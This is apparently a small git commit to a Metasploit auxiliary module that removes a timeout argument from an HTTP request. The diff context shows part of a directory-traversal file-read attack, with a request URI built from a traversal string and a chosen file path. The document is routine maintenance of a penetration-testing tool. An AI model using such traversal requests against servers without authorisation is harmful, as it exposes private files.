Remove timeout on line 59.

bug/bundler_fix
Roberto Soares Espreto 2014-12-01 00:51:12 -02:00
parent f3957ea428
commit ecbce679a8
1 changed files with 1 additions and 1 deletions

View File

@ -51,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary
res = send_request_raw({
'method' => 'GET',
'uri' => "/#{traversal}\\#{datastore['FILEPATH']}"
}, 25)
},)
if res && res.code == 200
vprint_line(res.to_s)